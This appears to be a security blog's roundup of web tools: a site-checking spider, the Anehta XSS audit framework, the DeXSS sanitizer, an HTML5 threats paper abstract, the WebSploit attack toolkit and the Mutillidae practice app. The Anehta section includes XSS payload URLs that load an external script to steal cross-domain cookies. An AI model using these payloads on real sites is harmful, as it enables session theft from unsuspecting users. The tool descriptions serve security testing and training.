sitecheck : Modular web site spider for web developers.

Spiders a website and logs many common problems including missing resources (HTTP 400), server errors (HTTP 500), slow pages, looping redirects, missing meta tags, duplicate content and potential SQL injection/cross-site scripting (XSS) vulnerabilities.

Various informational modules are also available including the logging of email addresses, IP addresses, comments in the HTML, spelling mistakes, W3C validation errors, accessibility issues, and low scores on the Flesch Reading Ease test.

Features

  • Authentication by HTTP form submission
  • Suspend and resume
  • Download and save a site
  • Highly configurable with support for multiple profiles
  • Modular processing of responses
  • Checks for some common DNS issues
  • Includes inbound links from search engines

Download Right Here | read more in here

Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

DeXSS

DeXSS provides a SAX2 Parser to help protect against Cross-site scripting (XSS) attacks. DeXSS uses TagSoup to parse potentially malformed input, followed by a SAX2 filter pipeline to remove JavaScript from HTML. You can use the DeXSS parser in place of your existing SAX2 parser, or you can use the DeXSS utility to provide a string-to-string conversion.
Release Notes 1.2 12 Jun 2012: This release adds a CSS sanitizer, uses the OSBCP CSS Parser, canonizes CSS in @style, and attempts to remove javascript: and expression(). Inline <style> CSS is still elided.

 

Download and read more in here : http://dexss.org/

HTML5 Top 10 Threats Stealth Attacks and Silent Exploit

Abstract : HTML5 is an emerging stack for next generation applications. HTML5 is enhancing browser capabilities  and able to execute Rich Internet Applications in the context of modern browser architecture.  Interestingly HTML5 can run on mobile devices as well and it makes even more complicated. HTML5 is  not a single technology stack but combination of various components like XMLHttpRequest (XHR),  Document Object model (DOM), Cross Origin Resource Sharing (CORS) and enhanced HTML/Browser  rendering. It brings several new technologies to the browser which were not seen before like  localstorage, webSQL, websocket, webworkers, enhanced XHR, DOM based XPATH to name a few. It has  enhanced attack surface and point of exploitations for attacker and malicious agents. By leveraging  these vectors one can craft stealth attacks and silent exploits, it is hard to detect and easy to  compromise…Read more in here [PDF Format]

Reasourceshttps://media.blackhat.com/

sitecheck v1.4 – Modular web site spider for web developers.

Checks for many common problems including missing documents (HTTP 400), server errors (HTTP 500), spelling mistakes, W3C validation errors, accessibility issues, missing meta tags, duplicate content, inbound links from search engines and potential SQL injection/cross-site scripting (XSS).
Features

  • Authentication by HTTP form submission
  • Suspend and resume
  • Download and save a site
  • Highly configurable
  • Modular design
  • Checks for some common DNS issues
For Installation, How To Usage Please README.txt

Platform : Windows & Linux

Download :
Windows : sitecheck-1.4.zip (36.8 KB) | Linux : sitecheck-1.4.tar.gz (31.8 KB)

Find other Version

read more in here : http://sitecheck.sourceforge.net/

Update Websploit V1.3 – Open source tool for scan and analysis Vulnerabilitys

WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability

Description :
[+]Autopwn – Used From Metasploit For Scan and Exploit Target Service
[+]wmap – Scan,Crawler Target Used From Metasploit wmap plugin
[+]format infector – inject reverse & bind payload into file format
[+]phpmyadmin – Search Target phpmyadmin login page
[+]lfi – Scan,Bypass local file inclusion Vulnerability & can be bypass some WAF
[+]apache users – search server username directory (if use from apache webserver)
[+]Dir Bruter – brute target directory with wordlist
[+]admin finder – search admin & login page of target
[+]MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
[+]MITM – Man In The Middle Attack


Platform : Unix/Linux

Download V1.3 : websploit-v 1.3.zip (1.1 MB)

Find other Version | Read more in here : http://code.google.com

Update Mutillidae V2.1.16 – Mutillidae Web Pen-Test Practice Application (owasp top 10)

Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test and hack a web application. Mutillidae can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to install or administrate their own webserver. It is already installed on Samurai WTF. Simply replace existing version with latest on Samurai. Mutillidae contains dozens of vulnerabilities and hints to help the user exploit them; providing an easy-to-use web hacking environment deliberately designed to be used as a hack-lab for security enthusiast, classroom labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an “assess the assessor” target for vulnerability software.

Mutillidae has been tested/attacked with Cenzic Hailstorm ARC, W3AF, SQLMAP, Samurai WTF, Backtrack, HP Web Inspect, Burp-Suite, NetSparker Community Edition, and other tools.

Change Log for Mutillidae 2.1.16:

  • Additional hints added to HTML5 Web Storage page to overwrite current web storage
  • Additional hints added to HTML5 Web Storage page concerning reading current web storage. Added code examples for document.write and using Firebug command line.
  • Added several new items to the Easter Egg file Mutillidae-Test-Scripts.txt
  • New vulnerability added. The HTML5 Storage page now has cross site scripting via DOM injection. The “storage key” field is vulnerable.
  • Added hints about DOM injection to the HTML5 Storage page.
  • Added hints to the capture-data.php page about cross site scripting
  • Updated the vulnerabilities listing
Platform : Windows & Linux

Download : LATEST-mutillidae-2.1.16.zip (7.1 MB)

read more In here : http://www.irongeek.com